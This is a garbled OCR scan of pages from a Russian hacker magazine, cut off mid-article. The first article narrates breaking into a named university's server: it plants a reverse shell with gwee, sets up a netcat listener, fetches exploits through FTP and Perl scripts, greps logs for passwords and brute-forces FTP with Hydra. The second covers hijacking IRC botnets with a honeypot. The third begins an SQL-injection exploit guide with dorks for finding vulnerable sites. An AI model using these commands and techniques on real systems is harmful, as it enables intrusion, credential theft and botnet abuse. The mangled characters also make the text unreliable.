[главная страница Донецкого технического уни- научимся кое-чему 
верситета: сейчас я взломаю этот сайт!] новому. 



[гиви, подкинь палку!] Внезапно я вспомнил о 0\л/ее. Да, именно о 
0\л/ее, а не о пиве :). Для донецких танкистов сообщаем: 0\л/ее — 
это универсальная программа для эксплуатации уязвимых сді- 
скриптов. Установка ее проста как две копейки: 

$ іаг -Х7.І дѵѵее-х.хх.іаг.д т. 

$ ссі дѵѵее-х.хх 
$ таке ипіх 

(или просто таке в зависимости от версии программы) 

$ таке іпзіаІІ 

Однако есть одно большое и мохнатое «но» при установке. Прог- 
рамма может не собраться вовсе, если на машине не установ- 
лен ОрепЗЗІ_. Чтобы отключить его поддержку, нужно открыть 
Макеіііе и внести следующие изменения: 

СРІ_А05=-ѴѴаІІ -ѴѴзІіасІоѵѵ -02 -0ѴѴІТН_55І_ 

(удаляем запись -0ѴѴІТН_55І_) 

І_0РІ_А03=-з -І55І -Ісгуріо (а здесь убираем -ІззІ -Ісгуріо) 

Все, теперь сохраняем изменения и собираем программу. 

В принципе, проблем больше возникнуть не должно. 0\л/ее теперь 
полностью готов к бою. Я запустил его с такими параметрами: 

./дѵѵее -у'?пеѵѵзіог=ісііа&раде=Г -т Т Ііир://Ма.сІоппіи.есІи.иа/сді- 
Ьіп/іпсІех.рІ -І_а -р4000 -ѵ -О 

Чтобы понять, какие флаги что обозначают, советую обратиться к 
соответствующей врезке. Замечу также, что такой прием не про- 
катит на большинстве фриварных шелл-хостингов, так как они зап- л 
рещают юзерам открывать вообще любые сетевые соединения. о 
Итак, теперь долгожданный терминал на институтской машине ® 
у меня был. На компе крутился І_іпих с ядром ветки 2.4, к тому же гГ 
тачка была мультипроцессорной, поэтому был шанс поднять а. 
свои привилегии локально с помощью существующих рыЫіс * 
ехрІоіГов. Но вот незадача: как же транспортировать эксплой- 







[ХАКЕР 07 [79] 05 > ВЗЛОМ 052 ] 




ты, если нет рабочего загрузчика ѵѵдеГа? Более того, на маши- 
не не было также и стандартного піх'ового Яр-клиента: его 
просто-напросто удалили! Но выход находится всегда. Можно 
попробовать записать код эксплойта в файл так: 
саГ>ехрІоіГ.с«//ЕОР. Потом вставить код и в конце дописать 
//БОР. Сохранив таким образом несколько паблик-отмычек, я 
уже хотел было компилировать их, но в ответ на дсс интерпрета- 
тор руганулся, что соттапб поі !оипсІ, и это разочаровало ме- 
ня :(. Какая-то безвыходная ситуация получается. Сервер защи- 
щен файрволом, нет возможности закачивать файлы, отсутству- 
ет рабочий компилятор. Что же делать? 

[смертельный иріоасі] Необходимо было придумать способ 
беспрепятственно закачивать файлы на сервер. Я подумал, что 
можно написать на РегІ программу, которая будет выкачивать 
целевой файл по Гі!!р. Полазав немного по инету, я нашел нуж- 
ное, а именно — инфу по модулям НТТР и І_\Л/Р. Я написал неболь- 
шой скриптик, с помощью которого можно загружать файлы на 
компьютер с отсутствующими утилитами для закачки (те же 
\л/деі, !е!сГі, сигі). Скрипт можешь найти на диске или скачать от- 
сюда: ІіГТр://ипіхГогде.огд/~83Ііх/х/ѵѵдеТ.Тсіг.дх. Я думаю, ты без 
труда разберешься, как он работает, если же возникнут вопро- 
сы, смело пиши на мыло. 

Сценарий принимает в качестве аргумента Иіір-ссылку, в кото- 
рой находится нужный документ, либо, если запущен с пара- 




[вот он — бастион сисадмина] 



метром « -! », парсит указанный текстовый файл, где хранятся 
ссылки, и выкачивает по ним файлы. Скрипт я сохранил на сер- 
вере, но запустить его не вышло — Сап 1 ! Іоса!е 
І_\Л/Р/ІІ5егАдеп!.рпп. Это же бред какой-то :(. Крыша тихонько 
скрывалась за горизонтом, помахивая шифером. Немного по- 
размыслив и почесав репу, я вспомнил об Яр. О протоколе Яр: 
функции работы с Яр-протоколом реализованы практически во 
всех языках программирования. Я выбрал рГір. На часах было 
уже четыре утра: немного поздновато, чтобы что-то выдумывать, 
тем более что изобретать очередной велосипед на ночь глядя 
совершенно не хотелось. Поэтому я открыл мануал по РНР, на- 
шел пример работы с Яр-функциями, скопировал его, добавил 
несколько строк своего кода и получил рабочий сценарий 
(ІіГГр://ипіхГогде.огд/~ззІіх/х/ГГр.рІір.М). Вуаля! Корявый Яр- 
иріоабег был готов. Пару слов о нем. 

Чтобы загрузить нужный файл, достаточно поменять значение 
переменной $гето!е_!іІе на нужное (я подразумеваю, что все 
необходимые файлы лежат на одном Яр-сервере). Запустив 



[ОѴѴЕЕ] 

Оѵѵее (Оепегіс ѴѴеЬ Ехріоііаііоп 
Епдіпе) — уникальная в своем 
роде программа, которая за- 
ливает реверсивный шелл-код 
на удаленный сервер, защи- 
щенный файрволом. Действи- 
тельно удобный (и в некото- 
рых случаях единственный) 
способ обхода брандмауэра. 
Ролик по использованию Оѵѵее 
ты мог увидеть в «Хакере» 
№73, но все же я расскажу 
немного о нем. Во-первых, 
Оѵѵее можно запускать как из- 
под ІІпіх, так и из-под 
ѴѴіпсІоѵѵз. Основные флаги для 
использования Оѵѵее: 

-у указываем часть уязвимой 
строки ДО параметра I 
-2 часть строки ПОСЛЕ параметра I 
-Б встроенный ТСР-слушатель 
портов. Короче говоря, если ука- 



зать этот флаг, не нужно будет 
включать неткат (пс -ѵѵ -I -р31337) 
-I адрес, к которому приконнек- 
тится реверсивный шелл-код. 

Остальные параметры ты мо- 
жешь изучить сам — я описал 
самые основные, именно они 
100% понадобятся тебе для 
работы. К слову, еще для ра- 
боты программы можно явно 
указать желаемый шелл-код, 
вид заливки, метод запросов 
(ОЕТ, РОЗТ) и т.д. Если у тебя 
возникнет какой-то вопрос по 
параметрам Оѵѵее, смело об- 
ращайся ко мне за советом. 
Иногда Оѵѵее неправильно оп- 
ределяет локальный адрес или 
берет 127.0.0.1, поэтому его 
можно указать явно. Если же 
твой компьютер находится в 
локальной сети и обладает се- 
рым ІР-адресом, из этой затеи 



ничего не выйдет, так как с то- 
бой не сможет соединиться 
взломанный компьютер. 

На первый взгляд, параметры 
программы кажутся непонят- 
ными и запутанными, но я сей- 
час приведу пример, и все ста- 
нет на свои места. Допустим, 
есть уязвимый сайт 
ѵѵѵѵѵѵ.ІЫ.сот/сді-Ып/зсгірІ.рІ? 
ИІе=ИсІІ&рагат=1 . 

Чтобы получить доступ к термина- 
лу, запускаем Оѵѵее следующим 
образом: 

./дѵѵее -у 1 ?!іІе= 1 -7. 1 1&рагат=1 1 -Б! -I 

наш_инет_адрес 

Шр://уѵуѵуѵ. ГЫ. сот/сді-Ып/зсгірГ.рІ 

Еще одно: если ты запускаешь 
Оѵѵее из-под ѴѴіпсІоѵѵз, то нужно 
использовать (обязательно) 
вместо одинарных кавычек «'» 
двойные «"». 




[скрипт-парсер логов] 




[веб-хранилище ДоНТУ] 

рГір-скрипт несколько раз, я слил в /ітр уже собранные 
эксплойты. С помощью отмычек под тгетарО и бо_Ьгк() я хо- 
тел получить рут-шелл. Скрестив пальцы, я пробовал запус- 
кать их по очереди, надеясь, что у меня установится иіб=0. Но, 
как на зло, ничего не выходило :(. Эксплойты, собранные на 
сторонней машине, ни в какую не хотели ломать ядро, ничего 
не получалось. 

[миссия невыполнима] Надо было как-то спасти ситуацию. 
Нужна была хоть какая-то зацепка. Я выполнил саі /еіс/разз- 
ѵѵс/ 1 дгер Ьоз/т и увидел, что юзеров с ЬазГі-оболочкой было 
только двое, не считая гооі'а. Вообще-то в раззмсі было много 
пользователей, но у большинства у них был только Лр-доступ к 
машине. Я присмотрелся к их директориям, которые по боль- 
шей части находились в /ѵаг/ѵѵѵѵѵѵ/ѵІіозТз. В каталоге было 
множество сайтов (именно те самые страницы кафедр, что 
располагались на главной странице университета), и среди 
них была очень интересная папка Іодз. В ней жило нереаль- 
ное количество апачевских логов по всем хостящимся на ма- 
шине сайтам. Перебирать их все вручную — самоубийство, 
поэтому я за две минуты написал вот такой вот скрипт: 



#!/изг/Ьіп/регІ 

$6 і ^= II /ѵа^/ѵѵѵѵѵѵ/ѵI^озіз/Iодз ,, ; 
орепсІіг(ОІВ,$сІіг); 

@а= геасісііг 01В; 

*огеас!і(@а){ 
ргіпі "Ѵіеѵѵіпд $_ ... \п"; 

зуз*епл("са* $сііг/$_ Ідгер разз »Лтр/дгерресІ.*х*"); 

} 

ргіпі "Оопе \п"; 

Он считывает все файлы из папки с логами, парсит каж- 
дый на наличие строки разз. Рекомендую прибегать к его 
услугам, когда требуется пересмотреть множество лог- 
файлов на наличие нужной строки и при этом не потерять 
время и рассудок :). Все «грепанутые» строки сохраня- 
лись в файл дгерреб.М в темпе. «Собственно, почему ты 
решил просматривать апачевские журналы?» — спро- 
сишь ты. А все потому, что в журналах есть очень много 
интересных записей ГіНрсІ-демона. Вот смотри: ты обра- 
щаешься к серверу и/и/и /.зоЬакоЯ.пеТ/роТз.рІір и дума- 
ешь, что останешься безнаказанным :). Не тут-то было. В 
этот момент на стороне сервера все запросы сохраня- 
ются в файл (обычно ассезз.Іод). Таким же образом, если 
во время выполнения запроса произошла ошибка (нап- 
ример: роіз.рНр — нет такого файла на сервере!), то результат ана- 
логичным образом старательно записывается в еггог.Іод. Вот так в лог- 
файлы могут попадать различные интересные записи, например па- 
роли от админок или другая ценная для нас информация. Поэтому 
одной из важных задач при проникновении на сервер является прос- 
мотр журналов ГіНр-демона. Итак, я запустил парсер логов и тупо вты- 
кал в экран, по которому быстро побежали строчки, свидетельство- 
вавшие о том, что проходит проверка журналов. Судя по размеру 
дгерреб.М, ночь предстояла долгая и, без сомнений, веселая :). 

[победа за нами] Утро следующего дня. Я просмотрел по диаго- 
нали два лог-файла общим размером в 8 Мб и узнал о сервере 
очень много интересных подробностей, но, к сожалению, рутово- 
го пароля среди полученных не оказалось. Я пробовал парсить 
конфиги с другими параметрами, но так ничего ценного и не выу- 
дил ;(. Выход напрашивался один: нужно запустить брутфорсер и 
натравить его на ІТр-сервер, чтобы поднять полноценный акк на 
сервере. Я закачал на сервант гидру, записал валидные учетные 
записи, загрузил несколько больших словарей и запустил подбор 
аккаунтов для локального РТР. Это довольно бронебойный прием: 
скорость локального брута достигает огромных значений. Стоит 
ли говорить, что я доковырял сервер довольно быстро :) © 



[ВЕЛОСИПЕД СВОИМИ 
РУКАМИ] 

Бывает, доставить и собрать тот 
же Оѵѵее на своем шелле не полу- 
чается (причин много). Не беда — 
мы сами с усами! Залить бэкдор на 
сервер можно самостоятельно — 
достаточно иметь на машине РегІ и 
модуль І_ѴѴР. Поэтому транспорти- 
ровка файла осуществляется элега- 
нтным регі-сценарием. Приводить 
код программы не буду, ты и так 
найдешь ее на диске (или отсюда: 

/? Пр://ипіхІогде.огд/~88Ьх/х/зепсі- 
ег.іаг.ді). Принцип в том, что файл 
построчно транспортируется на уда- 
ленный сервант и записывается в 
файл посредством /Ьіп/есііо. Если 
есть необходимость переправлять 
большие файлы (например полно- 
ценный веб-шелл), можно сделать 
пару изменений в коде, которые склеи- 
вают файл в несколько строчек и уже 
потом переправляют. Так получится 



нехилый прирост в скорости. Мой об- 
разец сценария смотри на диске. 

[МЕТОДЫ ЗАГРУЗКИ] 

Как видишь, есть множество методов 
загрузки информации на целевую 
машину. Приведу некоторые из них: 
Ш Браузеры Іупх(Ііпкз). Можно 
скачать любой файл браузером: 
Іупх ѵѵѵѵѵѵти/ПІе.с 

® Качалки. Известно множество 
качалок под *піх, и если на маши- 
не нет ѵѵдеі, можно попробовать 
ТеІсИ, сигі и другие. 

® ѴѴЕВ-зІіеІІ(рІір, сді). У большин- 
ства веб-шеллов есть возмож- 
ность загрузки файлов на сервер. 
И Вр. Р1р немного уступает по 
удобству всем вышеперечисленным 
методам. Тем более, если у тебя 
нет доступа к интерпретатору, то 
слить файл вряд ли получится: об- 
щаться с Йр-сервером необходимо 
в интерактивном режиме. Чтобы 



обойти это неудобство, можно запи- 
сать все команды в файл, а потом 
запустить Тір-клиент, перенаправив 
файл с командами ему. Пример: 

$есІіо 'изег Иаскег разз 1 >ГСр.М 
$есІіо 'де* ехріоіі.с Дтр/ехрІоіТс' »Др.М 
$есІіо 'диі*'»Д*р.*х* 

$Др -п Кр_зегѵег.ги <Кр.*х* 

[Ц Самопальные сценарии. Их при- 
меры я уже приводил. Это обычно 
скрипты на интерпретируемых язы- 
ках (например на том же РегІ). Если 
ты знаешь еще какие-нибудь инте- 
ресные (и нестандартные) методы 
заливки файлов, пиши — мне будет 
очень интересно узнать! В первую 
очередь рекомендую заливать 
именно веб-шелл, так как кроме вы- 
полнения команд (например привяз- 
ка /Ь/л/Ьаз/7 к порту) можно свобод- 
но скачивать/закачивать на сервер 
файлы, что не может не радовать :). 
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Смена командования 

О том, как можно увести чужой ботнет 

ВООДУШЕВЛЕННЫЕ РАЗРУШИТЕЛЬНОЙ СИ- 
ЛОЙ ВИРУСНЫХ ЭПИДЕМИЙ ХАКЕРЫ НАЧАЛИ 
ОСНАЩАТЬ СВОИХ ЧЕРВЕЙ МЕХАНИЗМАМИ 
УДАЛЕННОГО УПРАВЛЕНИЯ, ПРЕВРАТИВ ИХ В 
ПОКОРНЫЙ ИНСТРУМЕНТ С ПРАКТИЧЕСКИ НЕ- 
ОГРАНИЧЕННЫМИ ВОЗМОЖНОСТЯМИ. АРЕНДА 
РАЗВИТОГО БОТНЕТА СТОИТ ОГРОМНЫХ ДЕ- 
НЕГ, НО ЧТОБЫ ИХ ЗАРАБАТЫВАТЬ, СОВСЕМ 
НЕОБЯЗАТЕЛЬНО СОЗДАВАТЬ АРМИЮ С НУЛЯ. 

МОЖНО ОСУЩЕСТВИТЬ ВОЕННЫЙ ПЕРЕВОРОТ 
И ПОДЧИНИТЬ СЕБЕ АРМАДУ ЧУЖИХ ЧЕРВЕЙ, 

ЗАСТАВИВ ИХ ВЫПОЛНЯТЬ ТВОИ ПРИКАЗЫ. 

О ТОМ, КАК СДЕЛАТЬ ЭТО, МЫ И ПОГОВОРИМ 

ОіЬГОДНЯЙІ^^ісКаспѳрски ака мыщъх 



Следует пониматьънто, во-первых, использование ботнетов - 
это уголовно наказуемое деяние, а во-вторых, за угон чужих 
ботов можно запросто получить по голове еще и от их хозяи- 
на. Это же большие деньги, приятель, расставаться с которы- 
ми никто не спешит. Так что прежде чем переступать границу 
закона, подумай о возможных последствиях. 

На нашем диске ты найдешь исходники АдоВоі, предназначенные 
для ознакомления, заплатку для ѴМѴ/аге, а также все остальные 
описанные в статье программы и документы. 






[введение] Термин «бот» (ЬоГ англ.) вышел из ІРС, 
где он означал специального робота, висящего на 
канале и автоматически раздающего варез всем 
желающим. В чем достоинства такого подхода по 
сравнению с тем же РТР, например? Поднять ЕТР- 
сервер не проблема, но вот как донести его адрес 
до народа? Не так уж и легко. А для подключения 
к боту достаточно соединиться с ІРС-сервером 
и зайти на соответствующий канал. Управлять бота- 
ми через ІРС на самом деле очень удобно. Вместо 
того чтобы пыхтеть над системой удаленного управ- 
ления, можно использовать уже готовые компоненты 
и ІРС-серверы. Неудивительно, что создатели чер- 
вей взяли эту технику на вооружение. 

Проникнув на атакуемую машину, червь устанавлива- 
ет на ней бота, и этот бот через определенные про- 
межутки времени (или при каждом выходе в Сеть) сту- 
чится на один или несколько ІРС-серверов и терпели- 
во ждет распоряжений со стороны атакующего, час- 
то называемого Мастером. Машина с установлен- 
ным ботом называется зомби (ютЬіе), или дроном 
(бгопе). Армия дронов, управляемая Мастером, об- 
разует ботнет (Ьоіпеі — сеть ботов). Некоторые из 
таких сетей содержат сотни тысяч узлов и представ- 
ляют собой мощное оружие, способное задавить ко- 
го угодно. Пусть каждый дрон имеет канал ЗЗК (дро- 
нами обычно становятся домашние компьютеры, за 
здоровьем которых никто не следит), тогда эффектив- 
ная пропускная способность стотысячного поголовья 
дронов достигает 3 Гбит/с, чего вполне достаточно, 
чтобы перегрузить любой корпоративный сервер, 
большинство из которых висят на канале Т1, ширина 
которого составляет 1,5 Мбит/с. 

Обычно ботнеты организуются для рассылки спама, 
накрутки баннеров, осуществления ОЭоЗ-атак, похище- 
ния номеров кредитных карт и других подобных целей. 
Создать свою собственную армию дронов может дале- 
ко не каждый, и возникает естественный соблазн захва- 
тить уже раскрученную сеть. Если не захватить, то хотя 
бы воспользоваться ее услугами. Естественно, это про- 
тивозаконно и вообще мает дай, поэтому мы будем 
действовать строго в исследовательских целях, во всем 
придерживаясь УК. 

[что нам понадобится] Для захвата чужих ботнетов нам 
потребуется постоянное соединение с интернетом 
(например, 030, но на худой конец сойдет и ипіітііесі 
біаі-ир. Еще нам понадобится непатченная ѴѴ2К, игра- 
ющая роль приманки. Большинство червей атакует 
именно ее. Чтобы самому не стать жертвой атаки, при- 
манку следует расположить либо на отдельной маши- 
не без ценной информации, либо на виртуальном уз- 
ле, работающем под управлением ѴМѴѴаге. 
Наблюдение за деятельностью атакующих и грабеж 
проходящего мимо трафика возьмет на себя любая 
система обнаружения вторжений, ну или на худой 
конец персональный брандмауэр типа ЗуѲаіе 
РегзопаІ Еіге\л/аІІ 4.x. Для некоммерческого примене- 
ния он бесплатен. Более поздние версии не позволя- 
ют грабить содержимое пакетов без регистрации и 
для наших целей уже не подходят. Еще потребуется 
антивирусный сканер, нацеленный на поиск АсІѴѴаге. 
Я рекомендую МісгозоІЧ АпііЗру\л/аге, бета-версия ко- 
торого распространяется на свободной основе. Да, 
это Місгозоіф но не надо плеваться! Да, софтина тор- 
мозит, как бегемот, и ведет себя, как слон в посудной 
лавке, но другие работают еще хуже :(. 
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^ МАСТЕР^ 





[структура типичного ботнета] 



[ловушка для червя] 



Исследование внутренностей червя не обходится без отладчика 
и дизассемблера, в роли которых обычно выступают $оіі-Ісе и ЮА 
РРО. Это коммерческие продукты, но их легко найти в еМиІе, 
ЗЬагеі'е, ІРС или на любом хакерском диске. 

Несмотря на то, что концепция управления ботами по ІРС уже немного 
устарела, существенная часть ботнетов по-прежнему админится через 
ІРС, поэтому все примеры я буду приводить именно для таких червей. 
Для работы нам потребуется ІРС-клиент, поставляемый в виде 
исходников, чтобы мы могли его доработать (ІЗЗР, к примеру). 

[как мы будем действовать] Инсталлим на компьютер ѴМѴѴаге, ес- 
ли только не сделали этого ранее, устанавливаем заплатку Кости 
Кортчинского (см. врезку «Доработка ѴМѴѴаге»), создаем новую 
виртуальную машину (Рііе -> Ые\л/ Ѵіг+иаІ МасЫпе) и открываем ей 
доступ в интернет. Это можно сделать либо организовав мост меж- 
ду сетями, либо подняв полноценный ЫАТ. В случае моста виртуаль- 
ная машина просто подключается к локальной сети как обычный 
ЕіЬегпеі-узел, имеющий свой ІР и с точки зрения атакующего ничем 
не отличающийся от всех остальных узлов сети. Естественно, вирту- 
альный ІР должен быть предварительно выкуплен у провайдера, 
иначе у нас ничего не получится. Провайдеры довольно неохотно 
раздают ІР-адреса, поэтому установка МАТ намного предпочти- 
тельнее. В этом случае снаружи торчит лишь ваш собственный ІР- 
адрес (неважно, динамический он или нет), а все поступающие на 
него запросы перенаправляются на виртуальный узел, и атакую- 
щий даже не подозревает, с кем он реально имеет дело. 

Впрочем, все порты транслировать совершенно необязательно 
и можно ограничиться лишь четырьмя из них: 135/ТСР (РРС), 
139/ТСР (МеіВІОЗ Зеззіоп Зегѵісе), 445/ТСР (МісгозоП-ЭЗ) 
и 137/ІЮР (ЫеіВІОЗ Ыате Зегѵісе). Большинство червей ломится 



именно сюда. Чтобы задействовать ЫАТ 
в настройках виртуальной машины, вы- 
бираем ѴМ -> Зеіііпд -> N10 -> МАТ:ІІ5есІ 
іо зЬаге іЬе Ьозі'з ІР асісігезз. Затем вхо- 
дим в Есііі -> ѴігіиаІ Ыеі\л/огк Зеіііпд -> 
ЫАТ -> Есііі -> Рогі Еог\л/агсІіпд, нажимаем 
Асіб и в поле Нозі рогі вводим порт, кото- 
рый мы хотим транслировать, например 
135. В графе Еог\л/агсІесІ ІР Асісігезз указы- 
вается ІР-адрес виртуального ада- 
птера и целевой порт, совпадающий 
с транслируемым портом. 

Еще необходимо транслировать порты, 
используемые ботнетами для удаленного 
управления, иначе Мастер просто не смо- 
жет дотянуться до дрона. Эти порты не стандартизированы, и у каж- 
дого ботнета они свои. Чаще всего используются 6667 (ІРС), 903 
(МеЮеѵіі Васкбоог), 2745 (Вадіе Васксіоог), 3127 (МуЭоот Васкбоог), 
6129 (Эатемаге Ретоіе Абтіп) и некоторые другие. 
Устанавливаем на виртуальную машину девственно чистую ѴѴ2К, 
водружаем поверх нее ЗуѲаіе Регзопаі Еіге\л/аІІ, приказывая ему 
грабить весь трафик: Тооіз -> Орііопз -> І_од -> Саріиге ЕиІІ Раскеі, 
Махітит Іодіііезііе І5 1 048 576 КВ — конкретный размер лога вы- 
бирается по вкусу. Здесь действует принцип: лучше перебрать, 
чем недобрать, иначе критически важные пакеты будут безвозв- 
ратно утеряны. Чтобы брандмауэр не надоедал постоянными 
запросами, в меню Зесигііу выбираем АІІо\л/ АН, что означает «доз- 
волено все». Затем устанавливаем Місгозоіі АпііЗру\л/аге и дезак- 
тивируем защиту реального времени (Орііопз -> Зеіііпд -> 
РеаІТіте Ргоіесііоп). Нам он будет нужен только как сканер. Про- 
тиводействовать червям не входит в наши планы. 

Вот и все. Открываем пиво, входим в интернет и терпеливо ждем, 
пока какой-нибудь червь не заползет на наш компьютер. Долго 
ждать не придется. Каждый день на мой компьютер залезает по 
меньшей мере пара-тройка червей, многие из которых являются 
ботами. Известные черви опознаются сканером, неизвестные вы- 
являются просмотром логов брандмауэра (естественно, нужно 
знать основы ТСР/ІР, чтобы их дешифровать). 

[как побороть червя] Просматривая трафик, награбленный 
брандмауэром (І_одз -> Тгаіііс/Раскеі І_од5), ищем соединения, ус- 
тановленные с ІРС-сервером, по умолчанию расположенном на 
6667 порту. Среди прочей фигни в них должны находится строки 
РА53, ЫІСК, ІІ5ЕР и ѵЮІЫ, посредством которых червь подключает- 
ся к своему каналу. Приблизительно это выглядит так: 



[САМЫЙ ПОПУЛЯРНЫЙ БОТНЕТ] 

Первое место по популярности 
занимает АдоЬоі, насчитывающий 
свыше пятисот (!) модификаций. 
Это довольно продвинутый червь, 
написанный на приплюснутом Си 
с четко выраженной модульной 
структурой, что значительно упро- 
щает наращивание его функцио- 
нальности. АдоЬоі использует 
кроссплатформенную библиотеку 
ІіЬрсар для перехвата трафика и 
РСВЕ (РегІ СоппраііЫе Ведиіаг 
Ехргеззіопз — РегІ-совместимые 
регулярные выражения) для обра- 
ботки перехваченного контента 
(например, поиска паролей, номе- 



ров кредиток и т.д.). 

Внутри червя обнаруживается це- 
лый букет антиотладочных приемов. 
АдоЬоі распознает большинство от- 
ладчиков (ВоііІСЕ, ОІІуйЬд) и вирту- 
альных машин (ѴМѴѴаге, ѴігіиаІ РС), 
отказываясь работать в их присут- 
ствии. Кроме того, он может пря- 
таться в ІМТРЗ-потоках, скрывая 
факт своего существования от мно- 
гих примитивных ревизоров. 

АдоЬоі был написан конкретным 
немецким пареньком по кличке 
Адо, также известным под име- 
нем ѴѴопк, арестованным в мае 
2004 года за компьютерные 
преступления. Так хакерское со- 




[червь АдоЬоі, загруженный в дизассемблер] 



общество потеряло одного из 
самых талантливых своих 
представителей. Сейчас он си- 
дит в тюрьме, а его творение гу- 
ляет на свободе, распространя- 
ясь в исходных текстах по ли- 
цензии ОРІ_ (отсюда и огромное 
количество модификаций). 



[ГДЕ БРАТЬ ІР-АДРЕСА В Р2Р-СЕТЯХ?] 

Слепое сканирование ІР-адресов, которым занималось первое поколение червей, сейчас уже непопулярно. Это 
слишком заметно и катастрофически непроизводительно. Вот почему некоторые черви предпочитают черпать ІР-ад- 
реса из файлообменных сетей — из того же ейопкеу. Достаточно установить Р2Р-клиент, выложить несколько фай- 
лов с заманчивыми названиями («Голая Анжелика Моне», например), и юзеры потянутся за ними изо всех уголков 
Сети. Сколько из них будет дырявыми, можно даже не говорить! Поэтому, прежде чем качать порно из Осла, обяза- 
тельно сходи на ѴѴіпсІоѵѵз ІІрсІаіе и установи все заплатки, которые там только есть. 






и 




МАША 

ПРИМИ ы 
УЧАСТИЕ 

В АКЦИИ ѴѴІ-ГІ МАША 
ОТ ЖУРНАЛА ХАКЕР 

и компании р-иик 



^1 Тебе не придется напрягать мозг, 
чтобы проходить сложные голово- 
ломки. Нет! Все просто. Представь 
себя, будто ты сыщик открытых хот- 
спотов. У тебя в руках КПК или 
ноутбук и тебе необходимо проска- 
нировать различный районы Москвы, 
чтобы найти открытые ѵѵіТі точки. 
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Сплоит для ѵѵеЬ'а 

КАЖДЫЙ ДЕНЬ В БАГТРАК-ЛЕНТАХ ПОЯВЛЯ- 
ЮТСЯ ДЕСЯТКИ СООБЩЕНИЙ О НОВЫХ ДЫР- 
КАХ В ѴѴЕВ-СКРИПТАХ. ХАКЕРЫ ОБНАРУЖИ- 
ВАЮТ КАК СТАНДАРТНЫЕ СЗЗ И ЗОЫШЕС- 
ТІОЫ ОШИБКИ, ТАК И НЕСТАНДАРТНЫЕ БАГИ, 
ПРОДУКТ ВОСПАЛЕННОГО ПРОГРАММИС- 
ТСКОГО МОЗГА. НИ ДЛЯ КОГО НЕ СЕКРЕТ, 
ЧТО ЧАСТЫЕ УПОМИНАНИЯ ОБ УЯЗВИМОС- 
ТЯХ НОСЯТ ДОВОЛЬНО ПОВЕРХНОСТНЫЙ ХА- 
РАКТЕР И, ЧТОБЫ ВОСПОЛЬЗОВАТЬСЯ ПОЛУ- 
ЧЕННЫМИ СВЕДЕНИЯМИ, НУЖНО ПРОЯВИТЬ 
СПЕЦИФИЧЕСКИЕ НАВЫКИ. СЕГОДНЯ Я РАС- 
СКАЖУ ТЕБЕ О ТОМ, КАКИМ ОБРАЗОМ УДОБ- 
НЕЕ ВСЕГО ИСПОЛЬЗОВАТЬ ОШИБКИ В ѴѴЕВ- 
СКРИПТАХ И КАК АВТОМАТИЗИРОВАТЬ ЭТОТ 

ПРОЦЕСС I Никита Кисдицин (пікіТо 2 @геаІ. хакер. ш) 




Надо понимать, что напечатанный в журнале код — это лишь 
скелет полноценного сплоита. Окончательную версию отмычки 
ты найдешь на нашем диске. 
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Следует отчетливо осознавать всю ответственность, которую 
берут на себя хакеры, совершая компьютерные взломы. 

Они рискуют собственной свободой, перспективами, собствен- 
ным будущим. Не стоит нарушать законов твоей страны, если 
не хочешь обменять лучшие годы жизни на постный супчик, 
небо в клетке и тридцатиминутные прогулки по тюремному плацу. 



Учимся писать эксплойты для ѵѵеЬ- 
багов на примере І_окі под АЗР.ЫЕТ 

[какие ошибки?] Если вдуматься, каждая найденная дырка в \л/еЬ- 
скриптѳ исчерпывающе описывается при помощи набора конк- 
ретных значений передаваемых сценарию параметров, при ко- 
торых программа позволяет манипулировать собой. Так уж пове- 
лось, что абсолютное большинство сообщений об ошибках но- 
сит примерно такой характер: «в скрипте сооізсгірі.азр я нашел 
зді-ігуесііоп, который реализуется вот так: сооІ5сгірТ.а5р?ісІ=-1 ' 
ипіоп зеіесі 7, 1,раз5 Кот сооІіаЫе». Само собой, для того, чтобы 
на практике использовать какую-либо брешь, надо разобраться 
с ее происхождением и с тем, как она работает. Так, если речь 
идет об ЗОЫгуесііоп нужно разобраться со структурой базы дан- 
ных и программным окружением, если мы имеем дело с СЗЗ — 
надо определиться с тем, какая информация хранится в пользо- 
вательских соокіез и т.д. Все это необходимо, чтобы составить 
правильный набор параметров, передав которые, мы заставим 
сценарий выдать нам секретную информацию. Однако на прак- 
тике встает следующая проблема. Не всегда удобно вручную пе- 
редавать скрипту параметры, если вбить их в адресную строку 
еще можно, то редактировать каждый раз собственные соокіез, 
крайне неудобно. Кроме того, если необходимо проверить на 
наличие бага, скажем, сотню ресурсов, то от такой механичес- 
кой работы можно легко попасть на прием к специалистам кли- 
ники имени Кащенко (ныне Алексеева :) — прим. Лозовского). 
Чтобы не допустить такого развития событий, мы с тобой научим- 
ся для каждого интересного бага создавать универсальный 
эксплойт, который будет ломать однотипные уязвимые сценарии, 
установленные на различных серверах. 

[например?] Разумеется, чтобы 
у тебя не возникало лишних вопро- 
сов, я все буду показывать на при- 
мере. Я решил для разнообразия 
взять для опытов систему, написан- 
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[список уязвимых ресурсов] 



[создание сплойта в редакторе ее] 



ную на АЗР — ведь тему РНР-сценариев мы 
уже обмусолили, а АЗР еще толком не ломали. 
Хотя ты сейчас увидишь, что взламывать А5Р- 
программы ничуть не сложнее, более того, мы 
даже почти не столкнемся со спецификой :). 

В качестве подопытного кролика я взял сІо\л/п- 
Іоаб-систему со смешным названием І_окі. 
В самом деле, по ссылке тѵѵѵ.хокер.ги/розі/ 
26956/сІе1 : оиІі.05р ты можешь встретить упо- 
минание о найденном баге в этой системе. 
Уязвимость проста, как два рубля — клас- 
сический ЗОЫпіесііоп, который позволяет 
утащить любую информацию из БД. Чтобы 
начать упражнения, я быстренько ввел в гуг- 
ле запрос іпигЫомптапсѵ/саІІпІю.азр и 
мне выдался какой-то таиландский ре- 
сурс, который на проверку сразу же ока- 
зался уязвимым. Не следует думать, что 
система І_окі настолько ущербна, что стоит 
на единственном сервере в интернете, это 
не так. Стоит только изменить запрос на 



более демократичное іпигІ:"са1Мо.а$р?саТ=" и тебе сразу покажутся несколько стра- 
ниц с найденными сайтами, среди которых, как я заметил, почти все бажные. 

Ну что же, мы нашли бажный ресурс и теперь настало время попробовать жука в 
действии. По неизвестной нам пока причине приведенный в описании пример оказался 
нерабочим — вываливалось ошибок 500 и было понятно, что приложение пытается вы- 
полнить косячный запрос. Исправить эту ситуацию очень просто. Если мы хотим вместо 
одного оригинального запроса выполнить два и объединить (оператор ипіоп) их потоки 
вывода, то основная проблема заключается в том, чтобы число выбираемых хакерских 
запросов параметров совпадало с количеством выбираемых полей в оригинальном 
запросе. Чтобы добиться этого, нужно выполнить довольно механическую работу. Вот в 
нашем примере запрос добавляется в переменную саі. И требуется, чтобы во втором 
предложении число выбираемых полей было таким же, как и в оригинальном. Пробле- 
